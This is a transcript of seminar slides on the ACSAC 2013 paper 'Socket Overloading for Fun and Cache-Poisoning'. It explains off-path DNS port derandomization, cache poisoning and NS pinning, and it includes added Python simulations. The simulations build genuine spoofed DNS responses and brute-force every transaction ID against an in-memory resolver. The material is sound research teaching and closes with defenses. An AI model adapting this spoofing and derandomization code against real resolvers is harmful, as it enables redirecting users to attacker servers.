
Socket Overloading for Fun and Cache-Poisoning

29th Annual Computer Security Applications Conference (ACSAC 2013). Socket Overloading for Fun and Cache-Poisoning. Amir Herzberg (Bar-Ilan University); Haya Shulman (Technische Universität Darmstadt/EC-SPRIDE). Presented by 左昌國, 2013/12/10, Seminar @ ADLab, CSIE, NCU.


Presentation Transcript


  1. 29th Annual Computer Security Applications Conference (ACSAC 2013). Socket Overloading for Fun and Cache-Poisoning. Amir Herzberg (Bar-Ilan University); Haya Shulman (Technische Universität Darmstadt/EC-SPRIDE). 左昌國, 2013/12/10, Seminar @ ADLab, CSIE, NCU

  2. Outline • Introduction • Socket Overloading • Evaluation • Port Derandomization via Socket Overloading • Socket-Overloading for Attacks on DNS • Defenses and Conclusions

  3. Introduction • What is DNS • Ref: http://www.csie.ncu.edu.tw/~hsufh/COURSES/FALL2013/14_dns.ppt • Ref: Steve Friedl, http://unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html • Attacks on DNS (categorized by the position of the attacker) • Man-in-the-Middle (only cryptographic defenses help here; fewer than 3% of DNS resolvers enforce strict DNSSEC validation) • Off-path attacks (the attacker cannot see the traffic between resolver and name server; this is the setting of the paper)

  4. Introduction • Basic cache-poisoning (without any defense mechanism). Parties: Victim, Resolver, Name Server “ns.foo.com”, Attacker “6.6.6.6”, Attacker Server “6.6.6.7” • (1) Victim → Resolver: query IP for “www.foo.com” • (2) Resolver → ns.foo.com: query IP for “www.foo.com” • (3) Attacker (6.6.6.6) → Resolver: spoofed response “www.foo.com” == “6.6.6.7”, TTL = 1 year • (4) Resolver → Victim: response “6.6.6.7” (and the forged record stays cached for a year) • (5) Victim accesses “www.foo.com” == “6.6.6.7”, i.e. the Attacker Server

  5. Introduction – DNS Security • Challenge-Response Defenses (to off-path attacks) • Standardized challenges [RFC5452] • DNS transaction ID (TXID) field • Source port randomization (DJBDNS) • Port randomization algorithms [RFC6056] (Best Current Practice) • IP address randomization • Cryptographic Defense (DNSSEC)

  6. Introduction • Attack model (figure not reproduced in the transcript)

  7. Introduction – Related Work • Off-Path Port Derandomization Attacks • A. Herzberg and H. Shulman. “Security of Patched DNS”, Computer Security - ESORICS 2012 • Off-Path IP Address Derandomization Attacks • A. Herzberg and H. Shulman. “Security of Patched DNS”, Computer Security - ESORICS 2012 • O. Gudmundsson and S. D. Crocker. Observing DNSSEC Validation in the Wild. In SATIN 2011

  8. Socket Overloading • The target: discover the client’s (ephemeral) port in its communication with the name server • Interrupt-driven packet handling • Unix and Windows kernels are notified of hardware I/O events by interrupts • The NIC raises an interrupt for each arriving packet • These interrupts disrupt (pre-empt) protocol processing • Under high traffic load the socket’s receive buffer fills up, and subsequent packets, including the legitimate response, are dropped

  9. Socket Overloading for Port Discovery (parties: Client 1.2.3.6, Resolver 1.2.3.4, NS 5.6.7.8, Off-path Attacker 6.6.6.6) • (1) Client sends a DNS query to the Resolver • (2) Resolver forwards the query to the NS from an ephemeral port; the Attacker sends a burst of N packets to the port he is testing on the Resolver • (3) if the guess is right, the receive queue of that socket is full and the NS response is lost • (4) Resolver times out and retransmits the query • (5) NS answers the retransmission • (6) the response time observed at the Client is reported to the Attacker; a delayed answer means the guessed port was the one in use

  10.-11. Evaluation (measurement figures; not reproduced in the transcript)

  12. Port Derandomization via Socket Overloading • RFC 6056 specifies 5 port randomization algorithms • Algorithms #1 and #2: not vulnerable to socket overloading, but vulnerable to the attacks in [12] • Algorithm #3 – Simple Hash-Based Port Selection • Algorithm #4 – Double-Hash Port Selection • Algorithm #5 – Random-Increments Port Selection

  13. Alg. #3 – Simple Hash-Based Port Selection (RFC 6056 pseudocode)

    /* Initialization at system boot time. Could be random. */
    next_ephemeral = 0;

    /* Ephemeral port selection function */
    num_ephemeral = max_ephemeral - min_ephemeral + 1;
    /* offset is fixed per destination; next_ephemeral is one counter shared
       by all destinations, so ports toward every peer advance in step */
    offset = F(local_IP, remote_IP, remote_port, secret_key);
    count = num_ephemeral;

    do {
        port = min_ephemeral + (next_ephemeral + offset) % num_ephemeral;
        next_ephemeral++;
        if (check_suitable_port(port))
            return port;
        count--;
    } while (count > 0);

    return ERROR;

  14. Port Derandomization via Socket Overloading (parties: Client 1.2.3.6, Resolver 1.2.3.4, NS 5.6.7.8, Off-path Attacker 6.6.6.6) • Beforehand the Attacker measures the undisturbed response latency δ • (1) Client queries the Resolver • (2) Resolver sends DNS requests from srcPort x and from srcPort y • (3) at t = 0 the Attacker sends a burst of N UDP packets to dstPort z on the Resolver (z is the current guess) • (4) the DNS responses for dstPort x and dstPort y arrive; the answer reaches the Client at t = τ • (5) compare the response latency τ with δ: if τ > δ, then z == y (the burst filled the socket bound to y, the response was lost, and the Resolver had to time out and retransmit); else repeat with port z - 1

  15. Port Derandomization via Socket Overloading (figure not reproduced in the transcript)

  16. Alg. #4 – Double-Hash Port Selection (RFC 6056 pseudocode)

    /* Initialization at system boot time */
    for (i = 0; i < TABLE_LENGTH; i++)
        table[i] = random() % 65536;

    /* Ephemeral port selection function */
    num_ephemeral = max_ephemeral - min_ephemeral + 1;
    offset = F(local_IP, remote_IP, remote_port, secret_key1);
    index = G(local_IP, remote_IP, remote_port, secret_key2);
    count = num_ephemeral;

    do {
        /* table[index] is a per-destination counter: consecutive ports
           toward the same peer are sequential */
        port = min_ephemeral + (offset + table[index]) % num_ephemeral;
        table[index]++;
        if (check_suitable_port(port))
            return port;
        count--;
    } while (count > 0);

    return ERROR;

  17. Alg. #5 – Random-Increments Port Selection (RFC 6056 pseudocode)

    /* Initialization code at system boot time. */
    next_ephemeral = random() % 65536;  /* Initialization value */
    N = 500;                            /* Determines the trade-off */

    /* Ephemeral port selection function */
    num_ephemeral = max_ephemeral - min_ephemeral + 1;
    count = num_ephemeral;

    do {
        /* no per-destination state: the shared counter advances by a
           random 1..N on every allocation */
        next_ephemeral = next_ephemeral + (random() % N) + 1;
        port = min_ephemeral + (next_ephemeral % num_ephemeral);
        if (check_suitable_port(port))
            return port;
        count--;
    } while (count > 0);

    return ERROR;
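The probe loop of slide 14 and the weakness of Algorithm #3 (slide 13), set against Algorithm #5 (slide 17), as a simulation. This is an added example, not code from the paper or the slides. It transcribes the two RFC 6056 selection algorithms and models a resolver whose per-query UDP socket drops the genuine response once an attacker burst has filled its receive queue, so the query times out and is retransmitted, which the client sees as extra latency. The attacker runs one name server (6.6.6.6), so he observes the source port x of the resolver's queries to it, and wants the port y used toward the victim name server (5.6.7.8). Assumptions that are not from the page: exactly two allocations per round in a fixed order, no other traffic, a noiseless latency oracle, a receive queue of depth SOCKET_DEPTH, a keyed hash for F, and a search that walks the per-destination difference y - x (possible because Algorithm #3's counter is shared by all destinations) instead of the slide's walk over absolute ports z - 1.

```python
import hashlib
import hmac
import random

# Ephemeral range as in RFC 6056's examples; queue depth, latencies and
# addresses below are constructed for this simulation (not from the page).
MIN_EPHEMERAL, MAX_EPHEMERAL = 1024, 65535
NUM_EPHEMERAL = MAX_EPHEMERAL - MIN_EPHEMERAL + 1
SOCKET_DEPTH = 8          # datagrams a socket queues before it starts dropping
BASE_LATENCY = 0.020      # delta: undisturbed response time (s)
TIMEOUT = 1.0             # resolver retransmission timer (s)
RESOLVER_IP, ATTACKER_NS, VICTIM_NS = "1.2.3.4", "6.6.6.6", "5.6.7.8"


def F(local_ip, remote_ip, remote_port, secret_key):
    """Keyed hash of the connection id with a 16-bit output (RFC 6056 'F')."""
    msg = f"{local_ip}|{remote_ip}|{remote_port}".encode()
    return int.from_bytes(hmac.new(secret_key, msg, hashlib.sha256).digest()[:2], "big")


class Alg3:
    """RFC 6056 Algorithm 3: one counter shared by all destinations plus a
    per-destination offset, so ports toward different peers move in step."""

    def __init__(self, secret_key):
        self.next_ephemeral, self.key = 0, secret_key

    def select(self, local_ip, remote_ip, remote_port):
        offset = F(local_ip, remote_ip, remote_port, self.key)
        port = MIN_EPHEMERAL + (self.next_ephemeral + offset) % NUM_EPHEMERAL
        self.next_ephemeral += 1
        return port


class Alg5:
    """RFC 6056 Algorithm 5: random increments, no per-destination structure."""

    def __init__(self, rng, N=500):
        self.rng, self.N = rng, N
        self.next_ephemeral = rng.randrange(65536)

    def select(self, local_ip, remote_ip, remote_port):
        self.next_ephemeral += self.rng.randrange(self.N) + 1
        return MIN_EPHEMERAL + self.next_ephemeral % NUM_EPHEMERAL


def make_alg5(seed=2013):
    """Algorithm 5 selector with a seeded RNG (the seed is a constructed value)."""
    return Alg5(random.Random(seed))


class Resolver:
    """One UDP socket per outstanding query; a full receive queue drops the
    genuine response, which the resolver recovers by timeout and retransmit."""

    def __init__(self, selector):
        self.selector = selector
        self.sockets = {}     # bound source port -> datagrams queued on it

    def send_query(self, ns_ip):
        port = self.selector.select(RESOLVER_IP, ns_ip, 53)
        self.sockets[port] = 0
        return port

    def burst(self, dst_port, count):
        """Attacker datagrams: only a bound port has a queue to fill."""
        if dst_port in self.sockets:
            self.sockets[dst_port] += count

    def receive_response(self, port):
        """Latency the client observes for the query that used this port."""
        queued = self.sockets.pop(port, 0)
        return TIMEOUT + BASE_LATENCY if queued >= SOCKET_DEPTH else BASE_LATENCY


def guess_port(x, c):
    """Port lying c positions after the observed port x within the range."""
    return MIN_EPHEMERAL + (x - MIN_EPHEMERAL + c) % NUM_EPHEMERAL


def derandomize(resolver):
    """Attacker loop: each round the resolver queries the attacker's NS (port x,
    observed) and the victim NS (port y, hidden); the attacker overloads one
    guess and reads the latency oracle.  Walks the difference c = y - x rather
    than the slide's z - 1.  Returns (c, rounds) on a hit, else None."""
    for c in range(NUM_EPHEMERAL):
        x = resolver.send_query(ATTACKER_NS)
        y = resolver.send_query(VICTIM_NS)
        resolver.burst(guess_port(x, c), SOCKET_DEPTH)
        resolver.receive_response(x)
        if resolver.receive_response(y) > BASE_LATENCY:   # tau > delta: z == y
            return c, c + 1
    return None


def predict_next(resolver, c):
    """With Algorithm 3 the learned difference c names the next victim port
    before it is used; returns (predicted, actual)."""
    x = resolver.send_query(ATTACKER_NS)
    predicted = guess_port(x, c)
    actual = resolver.send_query(VICTIM_NS)
    resolver.receive_response(x)
    resolver.receive_response(actual)
    return predicted, actual
```

Against `Alg3`, `derandomize` needs at most NUM_EPHEMERAL rounds, and afterwards `predict_next` agrees with the resolver on every later query, because the shared counter keeps y - x constant. Against `Alg5` a burst may still hit by chance, but the difference learned from that hit says nothing about the next allocation, which is the property behind the conclusion slide's "avoid per-destination sequential port allocation".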

  18. Alg. #5 – Random-Increments Port Selection • Birthday protection: a birthday attack needs multiple concurrent requests (and responses) for the same question, so the resolver does not send multiple concurrent requests for the same query • How to circumvent it? Send N DNS requests for distinct names j.foo.org (0 <= j <= N): they are not the same question, so each request is sent and the protection is passed • Then apply socket overloading to find the correct port

  19. Port Derandomization via Socket Overloading (figure not reproduced in the transcript)

  20. Socket-Overloading for Attacks on DNS • DNS Cache Poisoning • NS Pinning via Resolver Socket-Overloading • NS Pinning via Name Server Socket-Overloading

  21. Socket-Overloading for Attacks on DNS – DNS Cache Poisoning (parties: Client 1.2.3.6, Resolver 1.2.3.4, NS 5.6.7.8, Off-path Attacker 6.6.6.6) • (1) Client queries the Resolver • (2) Resolver sends the query to the NS from the port the Attacker has already discovered • (3) Attacker sends 2^16 spoofed DNS responses to that port, one for each TXID value • (4) the response with the correct TXID is accepted and cached • (5) the genuine NS response arrives later and is ignored, since there is no longer a matching pending request

  22. Socket-Overloading for Attacks on DNS – DNS Cache Poisoning (parties: Client 1.2.3.6, Proxy Resolver 1.2.3.4, Upstream Resolver 8.8.8.8, Off-path Attacker 6.6.6.6) • (1) Client queries the Proxy Resolver • (2) Proxy forwards the query to the Upstream Resolver • (3) Upstream Resolver sends its response • (4) meanwhile the Attacker sends a burst of N spoofed packets to port 65000 on the Proxy • (5) if the correct port was hit in (4), the socket overflows and the response is dropped; the Proxy times out and retransmits, which the Client observes as extra latency
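The resolver-side matching behind slides 18, 21 and 22 as a worked example: what a spoofed response must get right, why 2^16 responses suffice once the source port is known, and why distinct names j.foo.org defeat birthday protection. This is an added example, not code from the paper or the slides. The wire format follows RFC 1035 (one question, one A record); the addresses, names, TTL and the simplified resolver (a random source port and TXID per outstanding query, RFC 5452 checks on port, source IP, TXID and question, and coalescing of identical outstanding questions) are assumptions. The port is taken as already known from the socket-overloading step; the overloading itself is not modelled here.

```python
import random
import struct


def encode_name(name):
    """RFC 1035 label encoding: length-prefixed labels, zero terminator."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def decode_name(pkt, pos):
    """Decode the name at pos, following compression pointers.
    Returns (name, position just after the name's own bytes)."""
    labels, end = [], None
    while True:
        length = pkt[pos]
        if (length & 0xC0) == 0xC0:                     # 2-byte pointer
            end = end if end is not None else pos + 2
            pos = struct.unpack("!H", pkt[pos:pos + 2])[0] & 0x3FFF
        elif length == 0:
            return ".".join(labels), (end if end is not None else pos + 1)
        else:
            labels.append(pkt[pos + 1:pos + 1 + length].decode())
            pos += 1 + length


def build_response(txid, qname, ip, ttl, qtype=1):
    """Authoritative-looking answer: header, echoed question, one A record."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(qname) + struct.pack("!HH", qtype, 1)
    rdata = bytes(int(o) for o in ip.split("."))
    answer = b"\xC0\x0C" + struct.pack("!HHIH", qtype, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_response(pkt):
    """Extract the fields a resolver matches on, plus the first answer."""
    txid = struct.unpack("!H", pkt[:2])[0]
    qname, pos = decode_name(pkt, 12)
    qtype = struct.unpack("!HH", pkt[pos:pos + 4])[0]
    _, pos = decode_name(pkt, pos + 4)
    _, _, ttl, rdlen = struct.unpack("!HHIH", pkt[pos:pos + 10])
    rdata = pkt[pos + 10:pos + 10 + rdlen]
    return {"txid": txid, "qname": qname, "qtype": qtype, "ttl": ttl,
            "ip": ".".join(str(b) for b in rdata)}


class Resolver:
    """Stub resolver: fresh random TXID and source port per outstanding query,
    RFC 5452 matching, and birthday protection (an identical outstanding
    question is not sent a second time)."""

    def __init__(self, seed=2013):
        self.rng = random.Random(seed)   # seeded only to keep the example reproducible
        self.pending = {}        # src_port -> (txid, qname, qtype, ns_ip)
        self.outstanding = {}    # (qname, qtype) -> src_port
        self.cache = {}

    def query(self, qname, ns_ip, qtype=1):
        if (qname, qtype) in self.outstanding:          # birthday protection
            return None
        txid = self.rng.randrange(1 << 16)
        port = self.rng.randrange(1024, 65536)
        while port in self.pending:
            port = self.rng.randrange(1024, 65536)
        self.pending[port] = (txid, qname, qtype, ns_ip)
        self.outstanding[(qname, qtype)] = port
        return port, txid

    def deliver(self, src_ip, dst_port, pkt):
        """Cache the answer only if port, source IP, TXID and question match."""
        entry = self.pending.get(dst_port)
        if entry is None:
            return False
        txid, qname, qtype, ns_ip = entry
        r = parse_response(pkt)
        if (src_ip, r["txid"], r["qname"], r["qtype"]) != (ns_ip, txid, qname, qtype):
            return False
        self.cache[(qname, qtype)] = (r["ip"], r["ttl"])
        del self.pending[dst_port]
        del self.outstanding[(qname, qtype)]
        return True


def spoof_all_txids(resolver, ns_ip, dst_port, qname, bogus_ip, ttl=31536000):
    """Off-path attacker who already knows dst_port (from socket overloading):
    one spoofed response per TXID value; returns how many were accepted."""
    return sum(resolver.deliver(ns_ip, dst_port, build_response(t, qname, bogus_ip, ttl))
               for t in range(1 << 16))


def birthday_bypass(resolver, ns_ip, n):
    """Distinct names j.foo.org are not coalesced: n requests, n open sockets."""
    return [resolver.query(f"{j}.foo.org", ns_ip) for j in range(n)]
```

With the port known, exactly one of the 2^16 spoofed responses matches and the forged record (here 6.6.6.7 with a one-year TTL, as on slide 4) is cached; the genuine answer that follows finds no pending entry. With the port unknown, the same attacker would have to repeat the 2^16 TXIDs for each of the 64512 candidate ports, about 2^32 packets, which is the work that socket overloading removes. `birthday_bypass` shows the slide 18 point: repeating the same question yields no new socket, while N distinct names yield N outstanding queries.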

  23. Socket-Overloading for Attacks on DNS – NS Pinning via Resolver Socket-Overloading (parties: Client 1.2.3.6, Resolver 1.2.3.4, NS 5.6.7.8, Off-path Attacker 6.6.6.6) • (1) Client queries the Resolver • (2) Resolver sends the query to the NS; the Attacker sends a burst of N packets to the (already known) source port on the Resolver • (3) the NS response is lost; the Resolver times out and retransmits • the Attacker repeats step (2) after t seconds, so each retransmission is lost as well • (4) the Resolver gives up on this NS and pins to another name server for the zone

  24. Socket-Overloading for Attacks on DNS – NS Pinning via NS Socket-Overloading (parties as above) • (1) Client queries the Resolver • (2) Resolver sends the query to the NS; the Attacker sends a burst of N packets at the NS, so the query is lost on the NS side • (3) Resolver times out and retransmits • (4) another burst of N packets at the NS, and the retransmission is lost too; the Resolver moves (pins) to another name server for the zone

  25. Defenses and Conclusions • Defenses: DNSSEC • full port randomization • avoid per-destination sequential port allocation • Conclusions: a new attack tool, UDP socket overloading, enabling cache poisoning and NS pinning • The results show that per-destination port assignment [RFC 6056] is vulnerable
